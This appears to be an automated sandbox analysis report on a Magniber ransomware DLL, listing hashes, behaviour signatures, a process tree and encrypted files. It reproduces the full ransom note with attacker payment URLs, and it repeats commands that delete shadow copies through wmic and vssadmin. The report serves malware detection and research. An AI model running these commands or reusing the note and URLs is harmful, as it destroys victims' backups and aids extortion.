Analysis

  • max time kernel
    119s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    28-12-2023 06:32

General

  • Target

    cbf762fb16cfe0149b46a61f3fb029fd.dll

  • Size

    38KB

  • MD5

    cbf762fb16cfe0149b46a61f3fb029fd

  • SHA1

    24d70407e12631bd83f39164bcd5ca6a74a0b459

  • SHA256

    2cd5879589f6af26488a2c9451d279306c472302375916e34f2646e7095ce4b9

  • SHA512

    e26dd9fcb24b7357da2230c87d6ee7ed59f1288118160b42d92161a42e77a91077a8a9c6b9ab49a68f6cdf7135d57be3a465190118112d1c0a49e7408b28a853

  • SSDEEP

    768:tNB4vRN8egwET/AOBHR9T7lGFDZFpVNKu90lQtwPFhXB+6OPvF65IM0:5A8ugn5T7le1l1Gb+6OPvdM

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt婍

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!
====================================================================================================
Your files are NOT damaged! Your files are modified only. This modification is reversible.
The only 1 way to decrypt your files is to receive the private key and decryption program.
Any attempts to restore your files with the third party software will be fatal for your files!
====================================================================================================
To receive the private key and decryption program follow the instructions below:
1. Download "Tor Browser" from https://www.torproject.org/ and install it.
2. In the "Tor Browser" open your personal page here:
http://12d014b07e301ec08cawbcrke.grv4f55lyxu36y26o4orfzy7vmwiljcruko6r7q4tatxvjugg4j66lid.onion/awbcrke
Note! This page is available via "Tor Browser" only.
====================================================================================================
Also you can use temporary addresses on your personal page without using "Tor Browser":
http://12d014b07e301ec08cawbcrke.hegame.xyz/awbcrke
http://12d014b07e301ec08cawbcrke.tietill.space/awbcrke
http://12d014b07e301ec08cawbcrke.hesmust.top/awbcrke
http://12d014b07e301ec08cawbcrke.salecup.club/awbcrke
Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://12d014b07e301ec08cawbcrke.grv4f55lyxu36y26o4orfzy7vmwiljcruko6r7q4tatxvjugg4j66lid.onion/awbcrke

http://12d014b07e301ec08cawbcrke.hegame.xyz/awbcrke

http://12d014b07e301ec08cawbcrke.tietill.space/awbcrke

http://12d014b07e301ec08cawbcrke.hesmust.top/awbcrke

http://12d014b07e301ec08cawbcrke.salecup.club/awbcrke

Signatures

  • Detect magniber ransomware 2 IoCs
  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 12 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (98) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Suspicious use of SetThreadContext 4 IoCs
  • Interacts with shadow copies 2 TTPs 8 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1236
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1520
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        PID:2328
    • C:\Windows\system32\wbem\wmic.exe
      C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
      2⤵
      PID:1480
  • C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    1⤵
    PID:804
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:1420
    • C:\Windows\system32\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\cbf762fb16cfe0149b46a61f3fb029fd.dll,#1
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1948
      • C:\Windows\system32\notepad.exe
        notepad.exe C:\Users\Public\readme.txt?
        3⤵
        • Opens file in notepad (likely ransom note)
        PID:1772
      • C:\Windows\system32\wbem\wmic.exe
        C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2792
      • C:\Windows\system32\cmd.exe
        cmd /c "start http://12d014b07e301ec08cawbcrke.hegame.xyz/awbcrke^&2^&55056338^&98^&409^&12"?
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1608
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" http://12d014b07e301ec08cawbcrke.hegame.xyz/awbcrke&2&55056338&98&409&12?
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:832
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:832 CREDAT:275457 /prefetch:2
            5⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:2476
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2800
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1888
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1280
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        PID:596
    • C:\Windows\system32\wbem\wmic.exe
      C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
      2⤵
      PID:1476
  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1328
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2544
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        PID:2532
    • C:\Windows\system32\wbem\wmic.exe
      C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
      2⤵
      PID:2968
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2580
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1952
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:2556
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2596
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    PID:2436
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:3020
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:1076
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1672
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1180
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:2224
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:1980
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1832
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1348
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:2732
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:1844
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:1824
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    PID:2268
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      PID:1888
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:2312
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2836
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:3020

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize
    344B

  • C:\Users\Admin\AppData\Local\Temp\CabFDC.tmp
    Filesize
    65KB

  • C:\Users\Admin\AppData\Local\Temp\Tar14FD.tmp
    Filesize
    171KB

  • C:\Users\Admin\Desktop\ClearRegister.ppt.awbcrke
    Filesize
    761KB

  • C:\Users\Admin\Desktop\ConvertFromExport.vstm.awbcrke
    Filesize
    269KB

  • C:\Users\Admin\Desktop\ProtectTest.pot.awbcrke
    Filesize
    381KB

  • C:\Users\Admin\Desktop\RenameInvoke.mov.awbcrke
    Filesize
    455KB

  • C:\Users\Admin\Desktop\RevokeConvert.mov.awbcrke
    Filesize
    473KB

  • C:\Users\Admin\Desktop\ShowSet.pptm.awbcrke
    Filesize
    548KB

  • C:\Users\Admin\Desktop\SyncSuspend.odt.awbcrke
    Filesize
    399KB

  • C:\Users\Admin\Desktop\UnpublishSet.vbs.awbcrke
    Filesize
    418KB

  • C:\Users\Admin\Pictures\readme.txt婍
    Filesize
    1KB

  • memory/1236-16-0x0000000001B40000-0x0000000001B45000-memory.dmp
    Filesize
    20KB

  • memory/1236-0-0x0000000001B40000-0x0000000001B45000-memory.dmp
    Filesize
    20KB

  • memory/1948-9-0x0000000000160000-0x0000000000161000-memory.dmp
    Filesize
    4KB

  • memory/1948-12-0x0000000000240000-0x0000000000241000-memory.dmp
    Filesize
    4KB

  • memory/1948-331-0x0000000004560000-0x0000000004561000-memory.dmp
    Filesize
    4KB

  • memory/1948-11-0x0000000000180000-0x0000000000181000-memory.dmp
    Filesize
    4KB

  • memory/1948-14-0x0000000000260000-0x0000000000261000-memory.dmp
    Filesize
    4KB

  • memory/1948-15-0x0000000000270000-0x0000000000271000-memory.dmp
    Filesize
    4KB

  • memory/1948-13-0x0000000000250000-0x0000000000251000-memory.dmp
    Filesize
    4KB

  • memory/1948-17-0x0000000004540000-0x0000000004541000-memory.dmp
    Filesize
    4KB

  • memory/1948-8-0x0000000000150000-0x0000000000151000-memory.dmp
    Filesize
    4KB

  • memory/1948-6-0x0000000000140000-0x0000000000141000-memory.dmp
    Filesize
    4KB

  • memory/1948-3-0x0000000000120000-0x0000000000121000-memory.dmp
    Filesize
    4KB

  • memory/1948-5-0x0000000000130000-0x0000000000131000-memory.dmp
    Filesize
    4KB

  • memory/1948-1-0x0000000001D70000-0x00000000026A8000-memory.dmp
    Filesize
    9.2MB

  • memory/1948-2-0x0000000000110000-0x0000000000111000-memory.dmp
    Filesize
    4KB